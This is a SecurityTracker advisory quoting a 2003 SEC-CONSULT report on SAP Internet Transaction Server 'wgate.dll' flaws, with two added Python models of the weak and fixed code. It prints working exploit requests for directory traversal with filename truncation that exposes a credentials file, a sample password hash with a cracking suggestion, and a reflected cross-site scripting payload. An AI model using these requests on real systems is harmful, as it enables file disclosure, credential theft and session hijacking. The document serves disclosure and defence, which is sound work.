SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Generic)  >   Internet Transaction Server
Vendors:   SAP
SAP Internet Transaction Server Bugs in 'wgate.dll' Disclose Files to Remote Users
SecurityTracker Alert ID:  1007597
SecurityTracker URL:  http://securitytracker.com/id/1007597
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Aug 31 2003
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 4620.2.0.323011, Build 46B.323011 (win32/IIS 5.0)
Description:   Several vulnerabilities were reported in the SAP Internet Transaction Server (ITS). A remote user can view files on the system. A remote user can view system information. A remote user can also conduct cross-site scripting attacks.

SEC-CONSULT reported several flaws affecting the 'wgate.dll' module.

It is reported that a remote user can view arbitrary files on the system. A demonstration exploit URL is provided:

http://[target]/scripts/wgate/pbw2/!?

The exploit requires the following parameters (where "+" is used to represent the encoded space character ["%20"]):

~language=en&
~runtimemode=DM&
~templatelanguage=&
~language=en&
~theme=..\..&
~template=services\global.srvc++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++

In this particular example, the "global.srvc" configuration file will be displayed. This file contains usernames and encrypted passwords. A remote user can retrieve the file and can use cracking methods to attempt to recover some of the passwords.
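The file disclosure above rests on two things: the "~theme" value walks up with "..\..", and the long run of spaces pushes the server-appended ".html" past a fixed-length cut, after which the Windows file system ignores the trailing spaces and opens the bare ".srvc" name. The following Python model is an added example written for this page, not code from SAP or SEC-CONSULT; the template root, the buffer length and the directory layout are assumptions, and only the "~theme" and "~template" values come from the advisory. It contrasts a resolver with the truncating behaviour described against one that allow-lists each path component and verifies the canonical result stays under the template root.

```python
import posixpath
import re

# Added example (not SAP's code): models the template-path handling the
# advisory describes and a hardened replacement. Root, buffer length and
# directory layout are assumptions; only the parameter values come from
# the advisory.
TEMPLATE_ROOT = "/its/templates"  # assumed location of the template tree
MAX_PATH_LEN = 64                 # assumed fixed buffer length used for truncation
SAFE_COMPONENT = re.compile(r"[A-Za-z0-9_-]{1,32}")  # allow-list for one path component


def resolve_template_weak(theme: str, template: str) -> str:
    """Behaviour the advisory describes: "<root>/<theme>/<template>.html" is
    built, then cut to a fixed length as a crude overflow guard. Padding the
    template name with spaces pushes ".html" past the cut, and Win32 file
    APIs ignore trailing spaces in a path component, so the bare filename
    (here a .srvc configuration file) is what gets opened."""
    path = "/".join([TEMPLATE_ROOT, theme, template]).replace("\\", "/") + ".html"
    path = path[:MAX_PATH_LEN]          # truncation "protection"
    path = path.rstrip(" ")             # what the Windows file system does with trailing spaces
    return posixpath.normpath(path)     # ".." components resolve here and escape the root


def resolve_template_safe(theme: str, template: str) -> str:
    """Hardened resolver: allow-list each component (no separators, dots or
    spaces), fix the extension server-side, and verify the canonical result
    still lies under TEMPLATE_ROOT."""
    for part in (theme, template):
        if not SAFE_COMPONENT.fullmatch(part):
            raise ValueError(f"rejected template component: {part!r}")
    candidate = posixpath.normpath(posixpath.join(TEMPLATE_ROOT, theme, template + ".html"))
    # Defence in depth: even after validation, confirm the result stays in the root.
    if posixpath.commonpath([TEMPLATE_ROOT, candidate]) != TEMPLATE_ROOT:
        raise ValueError("resolved path escapes the template root")
    return candidate


def is_rejected(theme: str, template: str) -> bool:
    """True when the hardened resolver refuses the (theme, template) pair."""
    try:
        resolve_template_safe(theme, template)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Parameter values from the advisory: ~theme=..\.. and
    # ~template=services\global.srvc followed by a long run of spaces ("+").
    traversal_theme = "..\\.."
    traversal_template = "services\\global.srvc" + " " * 80
    print("weak, normal request :", resolve_template_weak("pbw2", "login"))
    print("weak, advisory values:", resolve_template_weak(traversal_theme, traversal_template))
    print("safe, normal request :", resolve_template_safe("pbw2", "login"))
    print("safe, advisory values rejected:", is_rejected(traversal_theme, traversal_template))
```

The point of the model is that truncation is not input validation: it changes which file is opened rather than refusing the request. The hardened version rejects anything that is not a plain name and then re-checks the canonical path, so a future change to the layout or the extension cannot silently reopen the hole.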

It is also reported that a remote user can supply specially crafted (and non-existent) values for the following parameters to cause the system to disclose system information:

~service
~templatelanguage
~language
~theme
~template

It is also reported that the software does not filter HTML code from certain parameters before displaying an error message containing the user-supplied input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the SAP ITS software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The following demonstration exploit URL and parameter is provided:

http://www.server.name/scripts/wgate.dll?

~service=--><img%09src=javascript:alert(1)%3bcrap
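The root cause is that the "~service" value is written into the error page without output encoding. The following Python snippet is an added example for this page, not code from SAP or SEC-CONSULT: it decodes the query string given above the way a CGI gateway would, renders a stand-in error page both unfiltered and with contextual HTML escaping, and lists the tags a browser would see in each response. The error-page template text is an assumption; the query string is the one from the advisory.

```python
import html
import re
from urllib.parse import parse_qs

# Added example (not SAP's code): models an error page that echoes the
# "~service" parameter, once as the advisory describes (unfiltered) and once
# with HTML escaping. The page template is an assumption; the query string
# is the one given in the advisory.
ADVISORY_QUERY = "~service=--><img%09src=javascript:alert(1)%3bcrap"


def service_from_query(query: str) -> str:
    """URL-decode the ~service value as a CGI gateway would
    ("%09" -> tab, "%3b" -> ";", "+" -> space)."""
    params = parse_qs(query, keep_blank_values=True)
    return params.get("~service", [""])[0]


def error_page_unfiltered(service: str) -> str:
    """The weakness: user input lands in the HTML body unchanged, so the
    browser parses the "<img ...>" tag and evaluates its javascript: URL."""
    return f"<html><body>Service '{service}' not found</body></html>"


def error_page_escaped(service: str) -> str:
    """Fix: encode for the HTML text context before reflecting. quote=True
    also covers quotes, so the same value is safe inside an attribute."""
    return f"<html><body>Service '{html.escape(service, quote=True)}' not found</body></html>"


def reflected_tags(rendered: str) -> list:
    """Start-tag names present in the response body; used to confirm that
    only the template's own tags survive escaping."""
    return re.findall(r"<([a-zA-Z][a-zA-Z0-9]*)", rendered)


if __name__ == "__main__":
    service = service_from_query(ADVISORY_QUERY)
    print("decoded value    :", repr(service))
    print("unfiltered tags  :", reflected_tags(error_page_unfiltered(service)))
    print("escaped tags     :", reflected_tags(error_page_escaped(service)))
```

Note that the tab in "%09" is there because browsers accept any whitespace between a tag name and its attributes, so a filter that only looks for "<img " followed by a space would miss it; encoding the angle brackets removes the tag regardless of the whitespace used.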

The vendor was reportedly notified on August 2, 2003.

Impact:   A remote user can view arbitrary files on the system with the privileges of the ITS server.

A remote user can view system information.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the SAP ITS software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   The vendor has reportedly developed patches, as described in the following technical notes:

SAP advice 598074, 595383 and 654038

Vendor URL:  www.sap.com
Cause:   Access control error, Exception handling error, Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  SAP Internet Transaction Server



To the List,


*******************************************************************************************
*******************************************************************************************
*******************************************************************************************


============================================================
SEC-CONSULT Security REPORT SAP Internet Transaction Server
======================OOOOOOOOOOOO==========================

Product:        ITS ITS, Version 4620.2.0.323011, Build 46B.323011 (win32/IIS 5.0)

Vulnerabilities:

- Path/information disclosure
- Directory traversal
- Filename truncation
- Arbitrary file disclosure
- Cross site scripting/Cookie Theft

Vuln.-Classes:  Check out http://www.owasp.org/asac/ for more detailed information on "Attack Components"
Vendor:         SAP (http://www.sap.com/)
Vendor-Status:  vendor contacted (02.08.2003)
Vendor-Patches:  SAP advice 598074,595383 and 654038

Object: wgate.dll

Exploitable:
Local:          ---
Remote:         YES

============
Introduction
============

Visit "http://www.sap.com" for additional information.


=====================
Vulnerability Details
=====================


1) DIRECTORY/INFO DISCLOSURE
============================

OBJECT:
wgate.dll (win32 CGI-Communication binary)

DESCRIPTION:
Insufficient input- and output validation on miscellaneous user input allows the insertion of non existing values for the following user supplied parameters:

##################
~service
~templatelanguage
~language
~theme
~template
##################

Thus leading to several unwanted error messages which may include sensitive information on operating-system, software version and the directory structure of the attacked server.

EXAMPLE:
---*---
Http-Request:
http://www.server.name/scripts/wgate/pbw2/!?

with params:
~runtimemode=DM&
~language=en&
~theme=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&
---*---

REMARKS:
It might be possible that "~template" is an undocumented or forgotten variable (NOT confirmed).



2) ARBITRARY FILE DISCLOSURE (Directory Traversal / File Truncation)
====================================================================

OBJECT:
wgate.dll (win32 CGI-Communication binary)

DESCRIPTION:

EXAMPLE:
---*---
Http-Request:
http://www.server.name/scripts/wgate/pbw2/!?

with params:
~language=en&
~runtimemode=DM&
~templatelanguage=&
~language=en&
~theme=..\..&
~template=services\global.srvc++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++
---*---

(where "+" stands for spaces "%20" uri encoded).

Above will respond with the global server configuration file "global.srvc" on an ITS default-installation.

Normally the default-template extension (.html ?) gets concatenated to the rest of the template information.
Most probably somebody wanted to avoid a possible Bufferoverflow by truncating the input values if they exceed a given length.
Thus making it possible to shed the ".html" extension.

For some strange reason now and then the program responds with an error-message instead of giving out the requested file. This might be due to unwanted?/additional? HTTP-Request-Header infos (NOT confirmed).

REMARKS:

The global configuration file "global.srvc" contains username and des-encrypted password
---*---
~password       des26(2c94f116f4393f3d)
~login          Master
---*---

A good DES-cracker should be able to crack this password-hash either by using wordlists or by brute-force methods (NOT confirmed).


3) CROSS SITE SCRIPTING / COOKIE THEFT
======================================

OBJECT:
wgate.dll (win32 CGI-Communication binary)

DESCRIPTION:
Insufficient input- and output validation on miscellaneous user input parameters enables insertion of html/client side scripting tags.

EXAMPLE:
---*---
Http-Request:
http://www.server.name/scripts/wgate.dll?

with params:
~service=--><img%09src=javascript:alert(1)%3bcrap
---*---

REMARKS:
Due to excessive usage of cookies for managing sessions and/or states cookie-theft is very likely.
There might be several other locations where html/scripting tags can be inserted (NOT confirmed).


===============
GENERAL REMARKS
===============

Above findings derive from an external (black box) security test.
We would like to apologize in advance for potential nonconformities and/or known issues.


====================
Recommended Hotfixes
====================

Vendor-Patches: SAP advice 598074,595383 and 654038


EOF Martin Eiszner / @2003m.eiszner@sec-consult.com


=======
Contact
=======

SEC-CONSULT
Austria / EUROPE

0043 699 12177237
m.eiszner@sec-consult.com
http://www.sec-consult.com


*******************************************************************************************
*******************************************************************************************
*******************************************************************************************


-- 
Martin Eiszner / SEC-CONSULT
Austria / EUROPE

m.eiszner@sec-consult.com
http://www.sec-consult.com
http://www.websec.org
tel: 0043 699 121772 37

Copyright 2019, SecurityGlobal.net LLC